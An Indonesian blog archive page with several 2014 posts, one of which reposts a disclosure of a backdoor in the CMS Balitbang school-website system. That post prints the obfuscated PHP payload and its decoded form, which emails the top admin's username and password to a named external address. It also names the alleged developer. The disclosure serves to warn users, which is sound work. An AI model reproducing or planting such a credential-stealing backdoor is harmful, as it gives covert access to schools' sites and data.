Artikel Baru

Minggu, 27 Juli 2014

Selamat Idul Fitri 1435 H

Siomponk.Com: Saya selaku Owner dan Pimpinan SIOMPONK NETWORK mengucapkan:

SELAMAT HARI RAYA IDUL FITRI 1435 H
Mohon Maaf Lahir dan Batin

Semoga kita semua masih bisa menjalankan Ibadah Ramadan ditahun depan.
Amien...

Jumat, 25 Juli 2014

Widget Idul Fitri untuk Blog

Siomponk.Com: Beberapa hari lagi kita merayakan hari kemenangan untuk umat Islam, yaitu hari Idul Fitri. Supaya lebih meriah bagaimana jika blogmu juga dipasangi widget untuk merakayan Hari Lebaran tersebut, yaitu dengan memasang Widget Takbir Lebaran.

Saya pernah mempostingkannya waktu dulu, yang ada di blog ini juga. Jika anda ingin memasang widget seperti yang ada di blog ini, anda bisa langsung menuju kesini Selengkapnya ►

Kamis, 24 Juli 2014

Petasan Cabe dan Cabe-cabean

Siomponk.Com: Bulan Ramadhan selalu identik dengan petasan dan kembang api. Ramadhan = Musim Petasan, semua orang tahu itu. Dan, tak ada yang bisa membantahnya.

Maka bukan hal yang aneh lagi jika saat bulan Ramadhan, di sepanjang jalan raya strategis, selalu nampak para penjual petasan dan kembang api yang setia mangkal menunggu lapak dagangannya.

Jumlah penjual petasan selalu meningkat pesat Ramadhan demi Ramadhan, bak jamur di musim penghujan. Bahkan saking banyaknya jumlah pedagang petasan, di area-area strategis seperti pasar, pecinan, atau pusat perbelanjaan, penjual petasan ini bisa dengan mudah ditemukan setiap beberapa puluh meter sekali.

Ramadhan kemarin, beberapa hari menjelang hari raya, saya bersama Sastro kawan saya dan adiknya jalan-jalan ke pecinan untuk membeli baju baru dan celana. Maklum lah, tradisi sebelum lebaran, berburu baju dan celana baru.

Di tengah pencarian baju dan celana, adik Sastro yang masih kecil merengek minta dibelikan petasan cabe (petasan kecil yang ukurannya hampir sama dengan cabe rawit, makanya dinamakan petasan cabe).

Saya dan kawan saya sudah berusaha membujuk agar beli petasannya di warung dekat rumah saja, namun adik Sastro terus merengek. Mau tak mau, kami pun ngalah, dan berjanji akan membelikan petasan untuk adik kawan saya.

Di sepanjang pecinan, banyak sekali pedagang petasan. Yang mengherankan bagi saya adalah, beberapa lapak petasan itu dijaga oleh mbak-mbak yang menurut saya lumayan good looking. Terlalu cantik untuk ukuran penjual petasan.

Mungkin ini salah satu strategi pemasaran, karena saking banyaknya lapak petasan, maka mau tak mau para pengusaha dan penjual petasan harus mencari trik ampuh supaya dagangan petasannya laris. Salah satunya adalah dengan memperkerjakan wanita dengan fisik yang cukup menarik untuk menjadi penjaga lapak petasan.

Cara ini saya rasa cukup berhasil, terbukti saya dan Sastro beberapa kali tertarik untuk mampir. Tentu bukan kelengkapan petasannya yang menjadi prioritas, tapi kesemokan dan kesintalan mbak-mbak penjualnya.

Yah, Basa-basi dikit ndak apa lah, sekedar tanya harga, padahal ujung-ujungnya ndak jadi beli, alasannya karena harga yang terlalu tinggi. Padahal aslinya memang hanya ingin sekadar ngobrol dengan penjualnya.

Beberapa kali mampir di lapak-lapak petasan, akhirnya kami memutuskan serius untuk beli. Kami pun mencari lapak petasan yang penjualnya cocok dan sreg dengan naluri laki-laki kami (please, jangan dicontoh).

Setelah berjalan sekitar sepuluh menit, akhirnya kami menemukan salah satu lapak petasan yang dijaga oleh gadis yang begitu manis dan cantik. Dia masih muda, mungkin masih SMP, atau SMA, saya kurang paham. Tapi yang jelas, ia pintar bicara dan pintar merayu. Pakaiannya pun cukup menggoda.

"Nah, ini dia yang kita cari," kata Sastro.

Kami pun mendatangi lapak Si Gadis dan langsung menanyakan harga-harga petasan yang dijual.

Kami sengaja berlama-lama. Berlagak membandingkan model petasan satu dengan model petasan yang lain. Tentu tujuannya untuk bercakap-cakap dengan si penjual yang aduhai ini. Sambil memilih-milih petasan, kami bercakap-cakap cukup lama.

Setelah puas ngobrol, Sastro pun akhirnya membeli dua bungkus petasan cabe seharga sepuluh ribu rupiah. Saya sebetulnya masih belum terlalu puas dengan obrolan yang menurut saya masih terlalu singkat ini. Tapi mau bagaimana lagi, lha wong yang mau beli petasan Si Sastro, bukan saya.

Sepanjang perjalanan pulang, saya masih terus terbayang dengan paras penjual petasan yang aduhai manisnya tadi.

"Mantap ya Gus, beli petasan cabe, eh yang jual cabe-cabean. Semoga letusan petasannya sepedas penjualnya," kata Sastro. Saya manggut-manggut.

Ah, sungguh penjual petasan yang mempesona, parasmu sungguh sudah meledakkan hatiku.

Cerita oleh: Agus Mulyadi, Blogger Jomblo
Diambil dari: Kompas.Com

Rabu, 23 Juli 2014

Bagaimana Caranya Kami Curang...???

Siomponk.Com: Dapet massage facebook dari mbak Henny Rahma Dwiyanti yang mungkin jg didapat dari teman facebooknya.
Exit poll kalah menuduh curang...
Quick count kalah menuduh curang...
Real count kalah menuduh curang....
Rekap KPU kalah menuduh curang...
Pemilu di pusat pemerintahan ibu kota JAKARTA kalah, kalian minta diulang. Sudah diulang di 16 TPS Jakarta, tetap kalah di Jakarta...
Sekarang minta lagi pemilu ulang di di 5600 TPS Jakarta..
Kemudian Mendesak meminta SELURUH pemilu diulang...
Lalu meminta keputusan KPU ditunda.

Memangnya raja yang harus dipatuhi semua keinginannya...??
Memangnya tugas rakyat hanya mencoblos...??
Memangnya pemerintah hanya sekedar orang suruhan kalian...??
Memangnya trilyunan dana negara hanya untuk mengabuklan ambisi kalian saja...??

Media kalian semuanya menyiarkan klaim kemenangan hasil perhitungkan suara..
Kalianpun sudah mengumumkan kemenangan ke banyak media luar. Bahkan sudah pula show of power dengan sukuran sebelum pengumuman resmi. Lalu mengapa masih merasa perlu mengumpulkan 2000 advokat..??
Masih merasa perlu mendesak untuk pemilu ulang...??

Bagaimana caranya kami curang...??

Partai penguasa negeri ini ada bersama kalian..
Dua pertiga partai besar mendukung di belakang kalian. ....
Parlemen sudah dikuasai orang-orang kalian...

Golongan orang kaya dan ekstrimis agama ada di pihak kalian...
Ormas-ormas, aliansi bisnis, aliansi dagang, aliansi profesi, bahkan ibu ibu pengajian-pun sudah dalam genggaman kalian...
Petinggi negara, dari eselon tertinggi sampai pak RT berada di pihak kalian...

Enam puluh persen Gubernur dan kepala daerah seluruh Indonesia, yang menjadi penyelenggara pemilu di daerah kekuasaan masing masing, itupun berasal dari partai dalam koalisi kalian..
Aparat yang biasanya menjaga kamipun, menjual kesetiaan pada kalian...

Uang kalian begitu berlimpah..., itupun juga tak pernah habis..
Mampu berpromosi bertahun tahun dan selama periode kampanye mampu setiap 5 menit sekali beriklan prime time di beberapa stasiun televisi...

Kalian mampu membayari puluhan acara seremonial deklarasi, mengundang syukuran dan silaturahmi di hotel hotel berbintang, menyediakan ratusan ribu seragam putih berbodir garuda indah dan box makanan bagi simpatisan kalian, sedangkan simpatisan kami membawa bekal makanan berbuka sendiri sendiri. Seragam kami pun hasil swadaya sendiri untuk membuat yang hanya sebuah oblong biasa dan baju kotak-kotak sisa pilgub kemarin.

Kalian begitu tinggi di atas.. begitu memiliki segalanya.. In term of networking, power and money.. we are nothing against you ...

Jika para elit politik, elit sosial, elit entreperneur ada di pihak kalian. Jika semua leader, semua orang cerdas dan semua laki laki jantan di Indonesia sudah kalian klaim memihak kalian seluruhnya...

Sedang kami hanya memiliki hati rakyat...

Lalu bagaimana caranya kami curang ????

Minggu, 20 Juli 2014

Cara Menggabungkan File MP3 Menjadi 1 File

Siomponk.Com: Mungkin anda yang suka dengan Mp3 mengaji, yaitu Mp3 beberapa surat Al-Qur'an dan ingin menggabungkan menjadi satu sehingga untuk hafalan juga.

Dalam postingan kali ini, saya akan membagikan Tool nya, yaitu Merge MP3 alat yang digunakan untuk menggabungkan file Mp3 menjadi 1 buah file. Sodtware ini cukup kecil hanya 1,7 MB, dan mudah dalam pemakaian
Anda bisa mengunduhnya disini:

MergeMp3

CARA MENGGUNAKAN
  • Download Aplikasi Merge MP3 dan Extrak di komputer dengan menggunakan aplikasi Winrar atau sejenisnya (file diatas)
  • Klik 2 Kali file MergeMP3.exe

  • Muncul tampilan berikut

  • Klik icon   di Toolbar untuk melakukan pengaturan yang diperlukan

  • Pada Advance Options Cek list "Merge using raw stream mode" lalu klik OK
  • Klik icon di Toolbar untuk membuka file-file MP3 yang akan di gabungkan

  • Pilih beberapa file MP3 yang ingin digabungkan (file yang anda pilih pertama akan ditampilkan terakhir) lalu klik Open

  • Ceklist pilihan di atas dan isikan pengaturan yang diinginkan untuk file MP3 yang akan digabungkan nantinya yaitu Tittle, Artist, Album dan lainnya
  • Klik icon di Toolbar untuk menggabungkan file-file MP3 yang dipilih

  • Pilih direktori tempat penyimpanan File MP3 yang digabungkan tersebut, isikan nama file MP3 yang diinginkan lalu klik Save
  • Proses penggabungan file-file MP3 berjalan, tunggu hingga muncul tampilan berikut lalu klik OK

  • Buka direktori tempat penyimpanan file MP3 yang sudah digabungkan dan coba mainkan dengan MP3 player yang tersedia di komputer anda seperti Winamp


Selamat mencoba dan semoga bermanfaat...

Cara Download :
[+] Klik "SKIP AD".



sumber cara menggunakan

Sabtu, 19 Juli 2014

Koleksi Ceramah K.H. Zainuddin MZ

Siomponk.Com: Masih dalam bulan Ramadhan, maka kali ini saya akan mempostingkan tentang ceramah atau dakwah. Tentu anda semuanya sudah kenal dengan nama K.H. Zainuddin MZ, yang dulu sangat populer dengan dakwahnya di radio-radio dan mendapatkan sebutan "Da'i Sejuta Umat". Beliau meninggal pada tanggal 5 Juli 2011 silam.

Selama hidup beliau ini, sudah banyak melakukan ceramah di berbagai tempat dan ada yang direkam, sehingga bisa diputar kembali, nah dalam postingan saya kali ini, saya akan membagikan file mp3 yang berisi ceramah atau dakwah beliau. Walaupun memang tidak banyak, tapi alhamdulillah sudah terkumpul dan bisa di unduh oleh anda.

File ini berada di 4shared, untuk mengunduh dengan mudah, anda bisa menggunakan situs :
http://carilagu4shared.blogspot.com

Anda tinggal melakukan copy paste URL 4shared dan langsung bisa anda unduh. Tidak perlu login kembali.

Berikut ini file Koleksi Ceramah K.H. Zainuddin MZ

Ust. Zainudin MZ


https://ia601800.us.archive.org/21/items/KHZainuddinMZ/

Whole Item FormatSize
[generated M3U] M3U Stream 
Audio Files VBR MP3 Ogg Vorbis
KH Zainuddin MZ - 10 musuh setan 1.mp3 28.0 MB
KH Zainuddin MZ - 10 musuh setan 2.mp3 28.2 MB 23.2 MB
KH Zainuddin MZ - Al-Quran Imam Kita.mp3 3.6 MB 8.4 MB
KH Zainuddin MZ - Arak & Judi Racun Kehidupan.mp3 3.6 MB 9.1 MB
KH Zainuddin MZ - Bahaya Free Sex A.mp3 8.7 MB 12.8 MB
KH Zainuddin MZ - Bahaya Free Sex B.mp3 9.0 MB 13.3 MB
KH Zainuddin MZ - Berbakti Kepada Ibu & Bapa.mp3 3.4 MB
KH Zainuddin MZ - Bila Ajal Tiba.mp3 3.7 MB
KH Zainuddin MZ - Bila Doa Tak Terjawab A.mp3 8.5 MB 12.6 MB
KH Zainuddin MZ - Bila Doa Tak Terjawab B.mp3 8.6 MB
KH Zainuddin MZ - Cara Mendidik Anak.mp3 3.6 MB
KH Zainuddin MZ - Cobaan Hidup.mp3 3.6 MB
KH Zainuddin MZ - Dasar Dan Tujuan Hidup Muslim.mp3 13.4 MB
KH Zainuddin MZ - Dusta.mp3 3.5 MB
KH Zainuddin MZ - Golongan Penghuni Surga.mp3 13.5 MB
KH Zainuddin MZ - Golongan Yang Mendapat Perlindungan Dari Allah.mp3 3.6 MB
KH Zainuddin MZ - Harta Dunia.mp3 3.4 MB
KH Zainuddin MZ - Harta Takhta Dan Wanita.mp3 3.6 MB
KH Zainuddin MZ - Idul Fitri Dan Hari Kemenangan.mp3 39.8 MB
Kh Zainuddin MZ - 10 golongan teman setan.mp3 14.3 MB
KH Zainuddin MZ - Islam Dalam Semangat Kebersamaan 30.8 MB
KH Zainuddin MZ - Jaman Susah 45.7 MB
KH Zainuddin MZ - Laskar Ababil 18.5 MB
KH Zainuddin MZ - Mari Berhaji 3.3 MB
KH Zainuddin MZ - Memelihara Amal 54.1 MB
KH Zainuddin MZ - Mencari Jodoh 8.9 MB
KH Zainuddin MZ - Nabi Adam 13.3 MB
KH Zainuddin MZ - Nabi Ibrahim 3.3 MB
KH Zainuddin MZ - Nabi Sulaiman dan Ratu Bilkis 13.6 MB
KH Zainuddin MZ - Nabi Yusuf dan Siti Zulaikha 12.1 MB
KH Zainuddin MZ - Neraka Dan Calon Penghuninya 3.6 MB
KH Zainuddin MZ - Pahala dan dosa 1-2 8.4 MB
KH Zainuddin MZ - Pahala dan dosa 2-2 7.8 MB
KH Zainuddin MZ - Para Kekasih Allah 6.3 MB
KH Zainuddin MZ - Penyakit Rohani 1of 2 7.9 MB
KH Zainuddin MZ - Penyakit Rohani 2 of 2 7.7 MB
KH Zainuddin MZ - Reformasi (Baginda Nabi Besar Muhammad SAW) 49.0 MB
KH Zainuddin MZ - Rumah Tangga 3.4 MB
KH Zainuddin MZ - Sikap Kita Terhadap Al-Quran 1of2 3.1 MB
KH Zainuddin MZ - Sikap Kita Terhadap Al-Quran 2of2 3.2 MB
KH Zainuddin MZ - Syurga Dan Calon Penghuninya 3.6 MB
KH Zainuddin MZ - Taubat 10.3 MB
KH Zainuddin MZ - Ulama Dan Umaro 3.9 MB
KH Zainuddin MZ - Ulama Pewaris Nabi 13.1 MB
KH Zainuddin MZ - Ummar Bin Khattab 13.6 MB
Information FormatSize
KHZainuddinMZ_files.xml Metadata [file] 
KHZainuddinMZ_meta.xml Metadata 767.0 B 
Other Files Archive BitTorrent
KHZainuddinMZ_archive.torrent 35.8 KB 

Semoga bermanfaat untuk anda
Salam...

Selasa, 08 Juli 2014

Pemimpin Ideal: Cari Yang Kerja!

Siomponk.Com: Tanggal 9 Juli 2014 nanti kita sama-sama akan mengikuti pemilihan umum untuk menentukan siapa pemimpin kita 5 tahun ke depan gan.Tentunya gak mudah buat ane dan agan-agan buat nentuin pilihan yang tepat, itulah mengapa banyak suara yang mengambang alias golput seperti yang terjadi pada pemilu legislatif 9 April yang lalu. Tidak ada yang salah dengan golput, namun sungguh jauh lebih baik menentukan pilihan dengan resiko salah karena kesalahan akan membuat kita belajar menjadi lebih baik dibanding tidak melakukan apa-apa.

Kampanye besar-besaran, iklan yang luar biasa, dan jalinan politik sana sini udah menjadi sarapan kita dari berbagai media massa saat ini. Hal ini membuat kita bingung siapa sih yang bener-bener layak menjadi pemimpin bangsa ini sampai 5 tahun ke depan.

Kalo menurut ane sih:


CARI YANG KERJA

Tipe pemimpin yang mau kerja?

1. Bukan Hanya Janji Manis
Calon pemimpin yang bekerja keras gak cuman ngasih janji manis ke rakyat, tetapi juga bakalan ngelakuin semua yang udah dijanjikan sebelumnya. Mereka yang sudah bisa berjanji, harusnya juga bisa untuk ditepati. Hal ini yang menunjukkan dirinya apakah dia merupakan calon pemimpin yang ideal atau tidak. Jangan cuman memilih pemimpin yang punya janji manis, tetapi juga yang mau menepati janjinya dengan bekerja lebih keras.

2. Menjalankan Visi dan Misi yang dibuat
Calon pemimpin yang terbukti mau bekerja keras, akan menjalankan visi dan misi yang sudah ia canangkan sebelumnya. Orang yang bekerja, memiliki target yang akan mereka capai. Bukan hanya itu, hal ini membuktikan niatnya yang tulus untuk memajukan bangsa, dan pastinya demi rakyatnya juga. Kita gak akan memilih pemimpin yang cuman bisa kasih janji-janji doing kan gan?

3. Bisa Menjadi Contoh
Pastinya kita tahu, jika kita memiliki pemimpin yang bekerja keras, maka akan menjadi panutan buat bawahannya. Bahkan rakyatnya. Presiden yang bekerja keras, akan menjadi semangat kita untuk bekerja lebih baik. Bagaimana jadinya jika kita punya atasan yang pemalas, hanya bisa nyuruh-nyuruh? Pastinya bikin kita makin kesel kan gan? Tipe inilah yang kita butuhkan untuk memimpin bangsa yang besar seperti Indonesia

4. Dekat dengan Rakyat
Tipe calon pemimpin yang mau bekerja keras juga biasanya mau dekat dengan rakyat. Ia tidak sungkan untuk langsung terjun ke lapangan, langsung merasakan apa yang dialami oleh rakyat. Bukan hanya kepedulian yang ia rasakan, melainkan juga bagaimana ia merasakan menjadi rakyat biasa.

Lalu siapakah dia?
Cuman anda yang bisa memutuskan




sumber

Senin, 07 Juli 2014

Skandal Programer CMS Balitbang Kemdiknas RI

Siomponk.Com: Hari ini saya mendapatkan sebuah artikel yang bagus dari teman, artikel tersebut dituliskan di Facebook dengan judul yang sama seperti diatas. Berikut ini artikelnya.


Kali ini kami ingin membongkar skandal perogramer CMS Balitbang yang di gunakan oleh banyak lembaga pendidikan SD,SMP dan SMA/K, Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga saat ini yang menggunakan sistem tsb berkisar 100 ribu lebih lembaga pendidikan baik SD,SMP dan SMA/K.

Awal cerita rekan kami sebut saja "Mawar" dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.

Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".

Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.

Pembahasan:
1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb "anda bisa cek di google banyak sekali tutor hack sistem tsb" tapi masalah bug ini selesai setelah di rilis versi terbarunya.

2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.

Hal Teknik :
Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.

Kami sebut saja filenya bernama "admin2.php" di letakan di folder "functions"

Kode yg terdapat dalam file tsb sebagai berikut:

Code file admin2.php:
<?php eval(gzinflate(base64_decode(base64_decode("RFpSSHpxTllBSVN2MHBwVnQxZ1FIbEdqWHBEQkpKTU5teEg0RVEwbXg5UFBmNEdTcXVxcitsWHNXZmU3dXB0djJXVnI4VHZQbG9JbS80UEZlNERGNzM5ZXFXZk85RUlvK2d2MTE4aHpXS3ZYcEhoeW1yWldQSjFSRUV2akpsY01aT2ZRL2FBV0xHTTNBY3o4azByQWFBQU9uV05raXFnT3pRQU5oaHlkWHgzK1BPTXVRL3NNTFo3NU5qSG9qbzdSU1FlODFMSDRxT0dpNzFDT2N3U2E2VXJTR2o3ZFVqNlhzNDdRZ1BMRklER0k1bmpxbEdxaTVhZkIrWTFDTFdja3NuNTcrdHJzNGpmNTBmSzRNL0hzaWxYVTEycW8wcmxvNFdJNVcvQUxFcVIwK2krM1B5MHRLSEMvbnRTNXVKZ3VEMmVEMXo0UjViOTdaU3NYVTJkWlVxWlR4UHpJOVBnRkErRHEwbjdsWmN4d0laTHhjMUQ2TmtvZ2hyUnc5bE01eVZSQko5SWNobytSUjRIRVVMeGNHRU5WcHI0SXovMFIxY2JzN3RHRmNaNjk2aFdLTzBaangzRWpnTDYydnlkVW8xWjFuWE5udHpnZ1JvUFBNbTVwbENseHZmZlo4b3phY1JDOEgxRmZ0RmJ4amh1VFlRMGdDdjZ6dllPSm1pOVAvM3JEdGdycWF0NHpPbmhQNUZJWlJubUZrL213aVAzd1dRL3l5NWhXYXRaNTFyYXQyWU4yQnFFSjlRK3h0Z2ZlNjJpSWlhVlliTHU3Uys0NTc5L3FTclJrMWw2N21ZVVpaZnZ4WGR3VzlzNUwzNjllV1YwMThKc0NhdW9Xb0kranIrVnBzV2JwRFU3VmMvUHhaWTVCR3VQdWlVYjVqV1BXai9CbWQ0KzJydSt2cVVsTnIvQmVtVG9FR1RGVTBSKzZoemRyRXIrUFVZL3FFbmx6V3l1TXVWY3J2TmlGL0VPTzR1ODlSUXdYTlZXK0JBWmttVUEveHNVTm85QWE1UHRLK05hNTB3QkhrVG9mN1NkUmt0VnNZWWRLdkdOVzcxT3V1VWxFRkFUSzZLTVhFR3I5bU80ZjROYWhSUVBmZW94cElHK1lQQ0xjeHpRcjdSbzNCOGQzQnRHSEx3aFVpelg0N25NdTBpSThzVlRJZ0ZQek01TUpZVEhOaE0wTXZNQmxTd3BtRmVuZ001cUx3OTc3VmFFWG5hVnpFN3NmanlYR3NFRkNXRXhDSVpNNGluUVcyOUJjYTZjK3lKZ2ZQdTdUa0VsVENkbXh3cDFCWDRrSHFEZGNqWGFGbnJ1cy9Na1V3enJNZ0laQXRHckJSSTNQZTFoV09YS3ppdklnRUxiaG1jQVdoNFZsRjA0TzlLNTNKbG41NllWL1VXM3Q3bm5WYzNQb3VpUVp0cmtINUo0QmhoZFRQdmRVOWxTTDRGVStJQXpTNVdNckdiQU03ZU5XY1c0ekNHS1FaR1V4UHZ4S283UkkzUXZZWEhEUUV5OERJQTR2S2pxNzczWFVZZTBIYkRIbWRydGszeGJGTE9yWkJlS1JMQkRLV0FQZ0o3c0xQNTcxOHo2MDdmZ0FqZEI5YVhsN0h1MkVQYnhodHhnWDZsZGEyeHlVWUtadEVFZFJUNW9XWTkvc0pVOFpTZHB0UFBKSUZXMUYxUmFrMTJnK1hUSnZKWk9HMWJpQ2d5cGR2VnVvVkkybW9lSXQ2b3A1bmNPSHJWQS9zMmVFbjhYWU44dTVFcmVHUDdCMTdCM3Q4Mk5JSXBEaGxWSkVBaXNDcTBzYm1CNFIySEliTStFSVVhT1Z4eVVSN2U5MFlJKzUvcExtNTBWdmt0U25MazNvSFE5bHFBaVdTRGtadGZicTZWQm91WXhuVEFudklCanRKR3hXaGJQYmgySWdZZ2dJbjh6Zm90U1VDYXFjQzNDMWZtTHE4Tm1rOUlzNkVKdS84WVZHWTcrYlpBR2JGMDhmMDdZc0lMTEpEVVVrTjcyUXV6eldGOGFvcFdaK3hEdEs0dG5VVnU1cVorNlE4NS9EQ3dqdkRLWE10czhMbzlmWWRCYXhCRDY1dk5IY3VSTVd6Q2RjdW9ocWpTNVJpQ0dxUFdhT05hUU5KaTRzek5OeUhOMDV4SUxYaEFnbVpSeEVRSUYyUXp3NVU5SWU5dEVmUDV3QTEwR3I3Uk1BUHczZG1YYmJ6WnBDbVgxc2pubHlJdDRvV1VmK3VKT2haYXF1K2VVU2F0OXRrbEZmQm9FMFRNRU9uK2M4eUNKcWJRMytiaUluVGNqYmhGTWdkekI1Y09wWGtsN2YwMU9McWtRaFZPQ0I3UGNaamFDZ3dwNURLWTNqWUxIdkJEcmZQeVBuajc5Ly8vbno1OCsvdi80SA==")))); ?>

Terlihiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng'enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan :D itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt

Hasil Decrypt:
Hasil Decrypt admin2.php:
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
$query2="select * from user where userid='$row[userid]' ";
$alan2=mysql_query($query2) or die ("query gagal");
$r=mysql_fetch_array($alan2);
$data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers);
echo "Pesan terkirim";

Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi :) perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".

++++++++++++++++++++++++++++

Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.



Kami menyarankan bagi pengguna sistem CMS Balitbang yg melihat artikel ini untuk di kroscek ulang tentang sistem yg anda gunakan mengenai privasi dan keamanan data yg ada di Lembaga pendidikan anda.

Masuk peristiwa awal kami pun menyarakan agar Mawar rekan kami untuk tidak menggunakan sistem CMS Balitbang tsb.

Mungkin Pesan kami buat kawan2 Programer janganlah menjatuhkan harga diri anda sendiri denga hal2 konyol seperti kasus yg kami bahas ini.

++++++++++++++++++++++++++++

Ada Klarivikasi di komentar dari salah satu anggota tim CMS Balitbang kami masukan di sini:

----------- 1 ------------
Choirul Anam =>
"Saya baru saja mendapatkan link pembicaraan ini dari seorang kenalan. Saya adalah salah satu anggota team yang ikut andil dlam melahirkan CMS ini. Saya akan klarifikasi. Teman2 mohon tidak langsung menjustifikasi negatif tentang pemasangan backdor tersebut. Ini ada latar belakangnya. Pada awal kelahirannya dulu CMS ini tidak hanya dipakai oleh sekolah, tetapi dipakai juga oleh dunia bisnis, bahkan pemasangannya dibisniskan oleh beberapa pengembang website komersial. Kita tidak menginginkan hal ini terjadi. Maka disepakati pemasangan backdor ini. Intinya back dor tersebut dipasang untuk pengamanan intra, artinya jangan sampai CMS ini digunakan untuk dikomersialkan atau untuk webiste dengan isi negatif. Kita tidak punya mahsud apa2. Tidak akan mengambil keuntungan apapun dari pemasangan back dor tersebut. Dan perlu teman2 ketahui, pembuatan CMS ini bertujuan untuk mempermudah sekolah dalam membuat website, bahkan yang ikut pelatihannya akan memperoleh domain dan hosting gratis. Itu yang dapat saya klarifikasi, semoga ada manfaatnya, terima kasih"

Kami membalas =>
Terimakasih bung atas atensinya klarifikasi hal ini, di sinipun kami juga tidak ingin melakukan pemojokan kepada siapapun. Kami mengharap siapaun yng mengembangkan sebuah sistem opensource untuk juga mengutamakan Privasi dari pengguna sistem tsb. Mungkin ada cara lain yg bisa di lakukan selain membuat privasi pengguna terganggu untuk mennaggulangi kasus comersialisasi tsb. Coba kita ambil contoh terburuk bila sistem terjadi masalah data misal manipulasi negatif, apa bukanya pihak yg menanam backdor malah yg menjadi tujuan Fitnah. Sebelumnya terimkasih atas Klarifikasinya bung akan kami akan masukan di note kami ini."

----------- 2 ------------
Choirul Anam =>
Sebenarnya masalah backdor itu sudah pernah ada yang memunculkan sekitar 3 tahun yang lalu dari Malang. Dan sudah dibicarakan dengan pihak Balitbang, hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini. Saya mengikuti pengembangannya sampai versi 3.50, dilakukan pada Desember 2012. Versi sesudahnya saya tidak ikut lagi karena kesibukan di sekolah semakin banyak. Untuk usulnya itu, saya akan coba teruskan ke pihak Balitbang. Terima kasih. Saya off dulu yaaa, mau berangkat ronda.

Nama Disamarkan =>
ngutip perkataan abang developernya, "... hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini"

apakah memonitor pengguna cms dengan cara mengirim user + pass admin ke email tertentu? apakah tidak ada cara yang lebih 'terhormat'? saya bersyukur sekali malah, ada cms buatan anak indonesia yang bisa digunakan untuk mempermudah kelancaran proses go onlne sekolah2 di indonesia, tapi saya tidak habis pikir, kenapa bisa hal semacam ini terpikir oleh developer2 handal? ataukah ini memang sengaja di rencanakan / permintaan dari pihak balitbang sendiri? kita sebagai rakyat indonesia yang mendambakan keadilan harus memulai dari hal2 kecil seperti ini, karena kalo hal seperti ini saja tidak bisa diselesaikan, apalagi masalah besar yang lain?

++++++++++++++++++++++++++++++++++++

Salam Hormat untuk Saudaraku semuanya.

===//

KOPACI

---- ] kopaci.org [ ------

========//

sumber notes

Kamis, 03 Juli 2014

Banner Dukungan untuk JKW4P

Siomponk.Com: Untuk anda yang mendukung JOKOWI untuk menjadi Presiden Indonesia, anda bisa memasang banner dibawah ini pada blog atau situs anda. Saat ini banner baru terdapat 2 ukuran, yaitu 728x90 dan 300x250.

Berikut ini gambar dan code bannernya:

JKW4P 728x90



JKW4P 300x250



UNDUH LOGO #JKWJK - 2014



Salam Dua Jari